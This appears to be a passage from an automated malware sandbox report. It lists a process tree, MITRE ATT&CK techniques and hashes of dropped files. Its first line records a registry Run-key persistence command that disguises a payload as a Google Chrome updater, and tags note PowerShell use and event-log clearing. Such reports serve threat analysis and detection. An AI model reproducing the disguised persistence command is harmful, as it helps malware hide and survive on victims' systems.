"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4340
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:3304
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3708
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3900
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4056
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4144
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:2104
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:3568
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:1780
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:4452
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5088
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4612
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:1892
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4564
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:2996
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3624
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe a32deedf406e03daa0217b35b68f15d6 sdJVErYO2UGYljhTfQOAWw.0.1.0.0.01⤵
- Sets service image path in registry
PID:2388 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:2400
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
PID:2168
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:4256
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵PID:2472
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
1Indicator Removal
1Clear Windows Event Logs
1Modify Registry
2Obfuscated Files or Information
1Command Obfuscation
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5223bd4ae02766ddc32e6145fd1a29301
SHA1900cfd6526d7e33fb4039a1cc2790ea049bc2c5b
SHA2561022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e
SHA512648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc
-
Filesize
1KB
MD5e1d7973fb9071815b4241da5ec0dfb6a
SHA141f06afbd0ac9f9a0b226a2dd6fa9495d83209b9
SHA256b3953ac9f5752d996ec2545864d6ccf09ffe4b0f84f41a2cc52a95ad8103212b
SHA51266163114aba8867561ceac2124bc2060c351cb4a83c4f8d40bc6bfd8042881690ea8152e2b58ec55b4b6de17e1610642c90df602e1fb2658b4c3d0783f3a0900
-
Filesize
944B
MD5a66904fe28a9c28446e44f44e5ba034b
SHA1d4277226b3b95b2f92dc745bda7096a98d4a9f26
SHA256eb82b392f4cc90f4bb62e8d5d779a23ee0aa67832dcc8af94ce6099dd6cef8a7
SHA512a873699317c8905a3171985b04f9aa15993224bf18dad3233254229e04deec7232eb9effa1f6f17a9ad525d33a65cc7bb0000d899c2ebcc8ab312be6d01081a1
-
Filesize
287KB
MD5726a5b76f4c40551741ffdda14088ce3
SHA1df94d2f5475e8550b8d8f5de6937f896bf0ea6b8
SHA25669487840add22f155734e6e522e5e1437814caccc14e137e0a9a602b790a4cb9
SHA512477ce8e7b4dfdf288bce73bf3f30ce8a94c53617903eb5b5b9b4bb61795e56ed4cd908100f88fab76ff67fb7df6c94280be50576e672fcac27589117e1c7ce06
-
Filesize
2.2MB
MD54648d5ef582c7b17d9712f5b5b60f046
SHA1249bac0094f6aec1c4bb36f704ddca1c708401a7
SHA2560dbed06724205e7995f45b769454c3ebfd832f633471729eebce756cb90fc348
SHA51204839048b38a1bcff4254c77f479475c0b2e30e2d2be5fae65f23274107064a3d0abb3ca8d1693a1809db4db9dfbe7a2681c169ebe536fefb0cb01330d118f6f
-
Filesize
204KB
MD5e9b8360ea19d6c4f82f9fdb3adb8b566
SHA1d488e41552b2395c92be89473c9bdcde41795d18
SHA25631c9833faf987402ff5144a5690938f4e2bf6a8fcaf22b2df271c7e43d9f3e07
SHA512699934c81503f512a50f1ad3dd9ada48a38cc8f5a608b9bada9cea5d0f0d1e5340b59eb41fec528ad90d92351dd922daeabb459baea2da89ae2bf45963ce4f4d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD526fcacd27377df115ef919213279e2a9
SHA14eb3e59e6bb7c2ea1e779bae96b88bce66643c76
SHA256f85baf14da37326dcdf2a1553216a1d8325cb7a6b7c73478b6bf1a443823f28f
SHA51232578825f25bdddef862d492a1d01e2a5b692dc22639cf4d1538121d28407e50ae86f7a99a20857dc6032f9ba0f8dc095b479610f610262bedeee63b88785739